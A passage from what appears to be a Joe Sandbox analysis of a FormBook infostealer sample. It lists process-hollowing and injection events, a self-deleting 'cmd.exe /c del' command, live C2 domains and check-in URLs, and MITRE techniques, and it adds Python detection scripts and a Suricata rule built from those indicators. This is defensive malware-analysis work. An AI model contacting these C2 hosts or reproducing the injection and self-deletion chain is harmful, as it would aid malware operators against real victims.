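    r"Thread sleep time:\s*(?P<delay>-?\d+)s\s*>=\s*(?P<threshold>-?\d+)s"
)


def nt_interval_to_ms(interval_100ns: int) -> int:
    """Signed NT relative interval (100 ns units, negative = relative) to ms, truncated toward zero."""
    sign = -1 if interval_100ns < 0 else 1
    return sign * (abs(interval_100ns) // 10_000)


def classify_delay(delay_ms: int, threshold_ms: int = LONG_SLEEP_MS) -> str:
    """'infinite' for the Int64-minimum sentinel, 'long' at or above the threshold, else 'short'."""
    magnitude = abs(delay_ms)
    if magnitude >= NT_INFINITE_MS:
        return "infinite"
    if magnitude >= threshold_ms:
        return "long"
    return "short"


@dataclass(frozen=True)
class SleepEvent:
    image: str
    tid: int
    delay_ms: int
    verdict: str


def parse_sleep_lines(lines):
    """Turn report lines into SleepEvent records; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        delay = int(m["delay"])
        verdict = classify_delay(delay, abs(int(m["threshold"])))
        events.append(SleepEvent(m["image"], int(m["tid"]), delay, verdict))
    return events


def evasion_summary(events):
    """Per-image count of long or infinite sleeps: the number a triage note would quote."""
    summary = {}
    for ev in events:
        if ev.verdict != "short":
            summary[ev.image] = summary.get(ev.image, 0) + 1
    return summary


if __name__ == "__main__":
    for ev in parse_sleep_lines(SAMPLE_LINES):
        print(f"{ev.image} tid={ev.tid} delay_ms={ev.delay_ms} -> {ev.verdict}")
    print(evasion_summary(parse_sleep_lines(SAMPLE_LINES)))
```

A sandbox that patches sleeps forward will report these as "delayed" rather than timing out, which is why the report can still show the injection chain after the infinite wait; on a real host the parked thread simply never wakes, so the value is a useful marker of a sleep-skip-aware sample rather than of a timer.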

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.dunedinhyperlocal.com
Source: C:\Windows\explorer.exe | Domain query: www.multicoininvestment.com
Source: C:\Windows\explorer.exe | Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe | Domain query: www.institutosamar.com
Source: C:\Windows\explorer.exe | Domain query: www.petersonmovingco.com
Source: C:\Windows\explorer.exe | Domain query: www.quinnwebster.top
Source: C:\Windows\explorer.exe | Domain query: www.lianxiwan.xyz
Source: C:\Windows\explorer.exe | Domain query: www.oinfoproduto.com
Source: C:\Windows\explorer.exe | Domain query: www.theseattlenotary.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\ejecutable1.exe | Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: BE0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ejecutable1.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\ejecutable1.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Users\user\Desktop\ejecutable1.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ejecutable1.exe | Memory written: C:\Users\user\Desktop\ejecutable1.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable1.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable1.exe | Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 1764
Source: C:\Users\user\Desktop\ejecutable1.exe | Process created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp | Binary or memory string: !Progman
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
Source: C:\Users\user\Desktop\ejecutable1.exe | Queries volume information: C:\Users\user\Desktop\ejecutable1.exe VolumeInformation
Source: C:\Users\user\Desktop\ejecutable1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
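
The section above records three endpoint-visible events that, taken together, are more telling than any one of them: the sample relaunches itself (the same image as both parent and child), the injected explorer.exe starts resolving the C2 hosts, and msdt.exe, a Windows troubleshooting binary, spawns cmd.exe to delete the original file. The following detection logic is an added example written for this page, not code from Joe Sandbox; it runs over constructed Sysmon-style ProcessCreate (EventID 1) and DnsQuery (EventID 22) records that mirror this chain, and it correlates the deleted path against the images it has already seen launched, so the "self-deletion" finding fires only when a system binary deletes something that actually ran. The allowlist of domains a benign explorer.exe may resolve is an assumption for the example.

```python
"""Correlate self-relaunch, injected-system-process DNS and LOLBin self-deletion."""
import re

SHELLS = {"cmd.exe", "powershell.exe"}
# Assumed allowlist of domains a benign explorer.exe is expected to resolve.
EXPLORER_DNS_ALLOW = ("microsoft.com", "windows.com", "msn.com", "live.com")
# "del <path>" with optional single or double quotes around the path, as cmd.exe receives it.
DEL_RE = re.compile(r"\bdel\b\s+[\"']?(?P<path>[^\"']+?)[\"']?\s*$", re.IGNORECASE)

# Constructed Sysmon-style events (EventID 1 = ProcessCreate, 22 = DnsQuery) mirroring this report.
EVENTS = [
    {"EventID": 1, "ProcessId": 1200, "Image": r"C:\Users\user\Desktop\ejecutable1.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\user\Desktop\ejecutable1.exe"'},
    {"EventID": 1, "ProcessId": 1300, "Image": r"C:\Users\user\Desktop\ejecutable1.exe",
     "ParentImage": r"C:\Users\user\Desktop\ejecutable1.exe",
     "CommandLine": r"C:\Users\user\Desktop\ejecutable1.exe"},
    {"EventID": 22, "ProcessId": 1764, "Image": r"C:\Windows\explorer.exe", "QueryName": "www.lianxiwan.xyz"},
    {"EventID": 22, "ProcessId": 1764, "Image": r"C:\Windows\explorer.exe", "QueryName": "www.msn.com"},
    {"EventID": 1, "ProcessId": 1500, "Image": r"C:\Windows\SysWOW64\msdt.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"C:\Windows\SysWOW64\msdt.exe"},
    {"EventID": 1, "ProcessId": 1600, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\msdt.exe",
     "CommandLine": r'cmd.exe /c del "C:\Users\user\Desktop\ejecutable1.exe"'},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def dns_allowed(name: str) -> bool:
    """Exact or dot-suffix match only, so 'evilmsn.com' does not pass as 'msn.com'."""
    n = name.lower()
    return any(n == d or n.endswith("." + d) for d in EXPLORER_DNS_ALLOW)


def detect_chain(events):
    """Return (kind, pid, detail) findings in event order.

    self_reexec:            a process whose image equals its parent's image
    lolbin_deletes_sample:  a shell spawned by a non-shell parent deleting an image seen launched earlier
    system_process_dns:     explorer.exe resolving a name outside the allowlist
    """
    findings, launched = [], {}          # launched: lower-cased image path -> first pid
    for ev in events:
        if ev["EventID"] == 1:
            image, parent = ev["Image"].lower(), ev["ParentImage"].lower()
            launched.setdefault(image, ev["ProcessId"])
            if image == parent:
                findings.append(("self_reexec", ev["ProcessId"], ev["Image"]))
            if basename(image) in SHELLS and basename(parent) not in SHELLS:
                m = DEL_RE.search(ev["CommandLine"])
                if m and m["path"].lower() in launched:
                    findings.append(("lolbin_deletes_sample", ev["ProcessId"],
                                     f"{basename(parent)} -> del {m['path']}"))
        elif ev["EventID"] == 22:
            if basename(ev["Image"]) == "explorer.exe" and not dns_allowed(ev["QueryName"]):
                findings.append(("system_process_dns", ev["ProcessId"], ev["QueryName"]))
    return findings


if __name__ == "__main__":
    for kind, pid, detail in detect_chain(EVENTS):
        print(f"{kind:<22} pid={pid} {detail}")
```

The DNS rule on its own is noisy (explorer.exe legitimately resolves plenty of names), which is why it is reported as a separate, low-weight finding; the self-deletion rule is the strong one, because it ties a LOLBin parent, a shell child and a previously executed image path together in a single event.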

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: the same nine memory dumps listed under Stealing of Sensitive Information (processes 0, 2, 3 and 4), type: MEMORY

Mitre Att&ck Matrix

Techniques the report flagged for this sample, grouped by tactic; the digits in parentheses are the report's own counters, reproduced verbatim. Unflagged cells of the matrix template are omitted.

Execution: Shared Modules (1)
Privilege Escalation: Process Injection (612)
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (612); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); File Deletion (2)
Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (31); Remote System Discovery (1); System Information Discovery (112)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (3)

Behavior Graph

Behavior Graph ID: 491544 | Sample: ejecutable1.exe | Start date: 27/09/2021 | Architecture: WINDOWS | Score: 100

Top-level DNS/IP info: www.lianxiwan.xyz; www.area-arquitectos.com
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures

Process tree (signatures attached to each node):

ejecutable1.exe (started)
  signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
  ejecutable1.exe (started, child of the above)
    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    explorer.exe (injected)
      DNS/IP: oinfoproduto.com 216.172.172.208, 49167, 80, UNIFIEDLAYER-AS-1US, United States; www.lianxiwan.xyz 101.35.124.222, 80, TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN, China; 13 other IPs or domains
      signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
      msdt.exe (started)
        signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        cmd.exe (started)
          signatures: Deletes itself after installation

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
ejecutable1.exe | 37% | Virustotal | -
ejecutable1.exe | 13% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
2.2.ejecutable1.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://cdn.jsinit.directfwd.com/sk-jspark_init.php | 0% | Avira URL Cloud | safe
http://www.quinnwebster.top/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== | 0% | Avira URL Cloud | safe
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.rspb.org.uk/wildlife/birdguide/name/ | 0% | Avira URL Cloud | safe
http://www.oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== | 0% | Avira URL Cloud | safe
http://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz | 0% | Avira URL Cloud | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://www.mozilla.com0 | 0% | URL Reputation | safe
http://www.petersonmovingco.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://java.sun.com | 0% | Avira URL Cloud | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://www.wwiilive.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== | 0% | Avira URL Cloud | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0e | 0% | Avira URL Cloud | safe
http://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
theseattlenotary.com | 162.0.232.162 | true | false | - | high
www.petersonmovingco.com | 216.239.32.21 | true | false | - | high
oinfoproduto.com | 216.172.172.208 | true | false | - | high
www.area-arquitectos.com | 93.185.100.223 | true | false | - | high
dunedinhyperlocal.com | 184.168.131.241 | true | false | - | high
quinnwebster.top | 162.251.85.174 | true | false | - | high
www.lianxiwan.xyz | 101.35.124.222 | true | false | - | high
wwiilive.com | 34.102.136.180 | true | false | - | high
multicoininvestment.com | 162.0.229.241 | true | false | - | high
www.dunedinhyperlocal.com | unknown | unknown | false | - | high
www.multicoininvestment.com | unknown | unknown | false | - | high
www.wwiilive.com | unknown | unknown | false | - | high
www.institutosamar.com | unknown | unknown | false | - | high
www.quinnwebster.top | unknown | unknown | false | - | high
www.oinfoproduto.com | unknown | unknown | false | - | high
www.theseattlenotary.com | unknown | unknown | false | - | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.quinnwebster.top/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== | false | Avira URL Cloud: safe | unknown
http://www.oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== | false | Avira URL Cloud: safe | unknown
http://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz | true | Avira URL Cloud: safe | unknown
http://www.petersonmovingco.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== | false | Avira URL Cloud: safe | unknown
http://www.wwiilive.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== | false | Avira URL Cloud: safe | unknown
http://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== | false | Avira URL Cloud: safe | unknown
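
Two things stand out in the Contacted URLs table: every request goes to a different hostname but uses the same path, /u4an/, and the same constant parameter, a8a=O6e4vnipWHrd6Lz, while the other parameter carries a per-request base64-looking blob and the parameter order varies (theseattlenotary.com puts the blob first). Note also that every per-URL reputation verdict here is "safe"; it is the Yara hits and the Snort alert, not URL reputation, that carry the verdict for this sample, so these URLs should not be downgraded on that basis. The script below is an added example, not part of the Joe Sandbox report: it derives those invariants from the table's URLs mechanically and turns them into a regex matcher and a Suricata rule. The Suricata rule text is an assumed rendering (sid 1000001 is a placeholder) and should be validated with suricata -T before deployment.

```python
"""Derive campaign IOCs (hosts, path, constant parameter) from FormBook check-in URLs."""
import re
from urllib.parse import urlsplit

# Copied from the "Contacted URLs" table of this report.
CHECKIN_URLS = [
    "http://www.quinnwebster.top/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A==",
    "http://www.oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw==",
    "http://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz",
    "http://www.petersonmovingco.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA==",
    "http://www.wwiilive.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==",
    "http://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA==",
]


def raw_query_params(query: str) -> dict:
    """Split a query string without %-decoding or '+'-to-space translation
    (urllib's parse_qsl would mangle the base64 values), keeping them byte-exact."""
    params = {}
    for kv in filter(None, query.split("&")):
        key, _, value = kv.partition("=")
        params[key] = value
    return params


def parse_checkin(url: str) -> dict:
    parts = urlsplit(url)
    return {"host": parts.hostname, "path": parts.path, "params": raw_query_params(parts.query)}


def common_params(urls) -> dict:
    """name=value pairs identical in every URL: the campaign-constant parameter(s)."""
    pairs = None
    for url in urls:
        items = set(parse_checkin(url)["params"].items())
        pairs = items if pairs is None else pairs & items
    return dict(pairs or {})


def checkin_paths(urls) -> set:
    return {parse_checkin(u)["path"] for u in urls}


def hosts(urls) -> list:
    return sorted({parse_checkin(u)["host"] for u in urls})


def campaign_regex(urls):
    """Match any URL with the observed path and every constant parameter, in any
    parameter order; a URL lacking the constant parameter is deliberately not matched."""
    (path,) = checkin_paths(urls)        # fails loudly if the campaign used more than one path
    lookaheads = "".join(
        rf"(?=[^#]*[?&]{re.escape(k)}={re.escape(v)}(?:&|$))"
        for k, v in sorted(common_params(urls).items())
    )
    return re.compile(rf"^https?://[^/?#]+{re.escape(path)}{lookaheads}\?")


def suricata_rule(urls, sid: int = 1000001) -> str:
    """Suricata rule from the same invariants (assumed rendering; validate with suricata -T)."""
    (path,) = checkin_paths(urls)
    const = "; ".join(f'content:"{k}={v}"' for k, v in sorted(common_params(urls).items()))
    return (
        "alert http $HOME_NET any -> $EXTERNAL_NET any ("
        f'msg:"FormBook check-in {path} (analysis 491544)"; flow:established,to_server; '
        f'http.uri; content:"{path}?"; startswith; {const}; '
        f"classtype:trojan-activity; sid:{sid}; rev:1;)"
    )


if __name__ == "__main__":
    print("hosts:", hosts(CHECKIN_URLS))
    print("path:", checkin_paths(CHECKIN_URLS), "constant:", common_params(CHECKIN_URLS))
    print(campaign_regex(CHECKIN_URLS).pattern)
    print(suricata_rule(CHECKIN_URLS))
```

The path-plus-constant-parameter matcher is tighter than a path-only match: the truncated string http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0e recovered from msdt.exe memory shares the path but lacks a8a=, so it is not matched, which is the behaviour you want when the constant is what identifies this particular build.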

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://cdn.jsinit.directfwd.com/sk-jspark_init.php | msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.windows.com/pctv. | explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | false | - | high
http://investor.msn.com | explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | false | - | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.rspb.org.uk/wildlife/birdguide/name/ | ejecutable1.exe, ejecutable1.exe, 00000002.00000000.405132537.0000000000F52000.00000020.00020000.sdmp, msdt.exe, 00000004.00000002.668352306.0000000002A87000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.mozilla.com0 | explorer.exe, 00000003.00000000.414954186.0000000007147000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://business.google.com | msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp | false | - | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | false | - | high
http://treyresearch.net | explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://business.google.com/ | msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp | false | - | high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp | false | - | high
http://java.sun.com | explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmp | false | - | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000003.00000000.433820327.0000000008434000.00000004.00000001.sdmp | false | - | high
https://workspace.google.com | msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp | false | - | high
http://investor.msn.com/ | explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | false | - | high
http://www.piriform.com/ccleaner | explorer.exe, 00000003.00000000.413576733.0000000004513000.00000004.00000001.sdmp | false | - | high
http://computername/printers/printername/.printer | explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp | false | - | high
https://support.mozilla.org | explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp | false | - | high
http://servername/isapibackend.dll | explorer.exe, 00000003.00000000.428142762.0000000003E50000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667305054.00000000020E0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0e | msdt.exe, 00000004.00000002.666538687.00000000003F9000.00000004.00000020.sdmp, msdt.exe, 00000004.00000002.666548050.0000000000406000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
101.35.124.222 | www.lianxiwan.xyz | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | false
162.251.85.174 | quinnwebster.top | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
162.0.229.241 | multicoininvestment.com | Canada | 22612 | NAMECHEAP-NETUS | false
216.239.32.21 | www.petersonmovingco.com | United States | 15169 | GOOGLEUS | false
34.102.136.180 | wwiilive.com | United States | 15169 | GOOGLEUS | false
184.168.131.241 | dunedinhyperlocal.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false
162.0.232.162 | theseattlenotary.com | Canada | 22612 | NAMECHEAP-NETUS | false
216.172.172.208 | oinfoproduto.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 491544
Start date: 27.09.2021
Start time: 17:30:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: ejecutable1.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@6/0@11/8
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 21.3% (good quality ratio 20.5%)
• Quality average: 72.8%
• Quality standard deviation: 27.8%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 127
• Number of non-executed functions: 26
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateFile calls found
• Report size getting too big, too many NtEnumerateValueKey calls found
• Report size getting too big, too many NtQueryAttributesFile calls found

Simulations

Behavior and APIs

Time      Type             Description
17:31:14  API Interceptor  70x Sleep call for process: ejecutable1.exe modified
17:31:36  API Interceptor  194x Sleep call for process: msdt.exe modified
17:32:08  API Interceptor  1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.737665264052285
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: ejecutable1.exe
File size: 840192
MD5: ff2724ddf0ef0525e9e419db5199e96f
SHA1: 3cda3d12e93a6e06f22e205010cb6c3d674285a1
SHA256: 5a5510cd8e0b77c01caac5b519c66d07d1621682e08179ead01adbc8d517b913
SHA512: 262a0900141207cd427a56b89a0ddf6dd81da957e7015069833662b450608a0a94551692d06bfb01d060c7f4cd5324dd2f3bf6ca36fd02ccdfc2f1b87b48353f
SSDEEP: 12288:gH/yso4G0/mo1M3d08zo70QuynqopwCtKbvygfgGvSwpNM6M9MvWdo9S7LCn1tM4:ULzIFXF+FxViEoP+h/CshCU6+S
